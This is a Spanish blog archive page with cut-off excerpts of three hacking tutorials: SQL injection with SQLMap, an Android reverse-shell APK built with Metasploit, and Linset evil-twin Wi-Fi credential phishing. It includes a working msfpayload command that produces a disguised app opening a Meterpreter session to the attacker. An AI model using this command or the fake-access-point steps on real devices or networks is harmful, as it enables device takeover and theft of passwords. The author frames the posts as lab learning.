Ir al contenido principal

Entradas

Mostrando entradas de 2015

Kali Linux - II Inyección SQL con SQLMap

Según Wikipedia Inyección SQL es un método de infiltración de código intruso que se vale de una vulnerabilidad informática presente en una aplicación en el nivel de validación de las entradas para realizar operaciones sobre una base de datos... La inyección SQL esta en la cima de el delito en la red, por el valor de las bases de datos que están en la red (empresas,tiendas,banca online...) ahí se almacenan todo tipo de credenciales, desde nombres de usuario hasta números bancarios. Como sabréis, las inyecciones SQL en algunos casos se pueden realizar desde el propio navegador, inyectando caracteres en una consulta desde la pagina web hasta la base de datos,  que generen un tipo de error, esa sera la parte del código SQL vulnerable, es decir inyectaremos código SQL intruso contra ese parámetro "mal configurado" . ESTA PRACTICA FUE REALIZADA EN UN ENTORNO CONTROLADO, CON DISPOSITIVOS PROPIOS, RECORDAR QUE ACCEDER Y ROBAR INFORMACIÓN AJENA ES UN DELITO PENALIZADO Y
Leer más

Kali Linux - I Reverse TCP Android LVL0 con Metasploit & SET

Como ya sabéis, metasploit es la herramienta de explotación de vulnerabilidades por excelencia, en esta ocasión vamos a "atacar" dispositivos móviles personales con sistema Android. El escenario es el siguiente, el equipo atacante (Kali Linux), un servidor FTP para que nuestras victimas puedan descargar fácilmente la App y las victimas (terminales Android). Comencemos! es esencial tener instalado metasploit, en mi caso la distribución Kali linux lo trae integrado, así que procedemos, empezamos con el payload. Crear el payload es muy sencillo, basta con  introducir esta linea en una terminal. msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=8888 R> fiestasbilbao.apk Esto indica lo siguiente, la App lleva la instrucción de iniciar una sesión meterpreter contra 192.168.1.11 por el puerto 8888, la R indica que la salida es en formato .apk, escogemos el nombre e introducimos la orden, tardará un poco, una vez finalice podremos observar nu
Leer más

Wifislax 4.9 - II Conseguir acceso a redes WPA/WPA2-PSK con Linset

Buenas a todos ! esta es la segunda entrada de Wifislax, conseguir acceso a redes WPA/WPA2-PSK con una herramienta incluida en nuestra distribución para auditar redes inalámbricas: LINSET. LINSET es un script con  un objetivo claro, conseguir acceso a redes sin necesidad de diccionarios ni fuerza bruta, es un tipo de "ingeniería social" su funcionamiento es el siguiente. 1. Escanea la red. 2. Selecciona la red. 3. Busca handshake (se puede usar sin handshake) 4. Se elige una de las varias interfaces web en diferentes idiomas 5. Se monta un AP Falso imitando al original 6. Se crea un servidor DHCP sobre el AP Falso 7. Se crea un servidor DNS para redirigir todas las peticiones al Host (Equipo Atacante) 8. Se lanza el servidor web con la interfaz seleccionada (Idioma escogido en el punto 4) 9. Se lanza el mecanismo para comprobar la validez de las contraseñas que se van a introducir 10. Se desautentifica a todos los usarios de la red, esperando que se conec
Leer más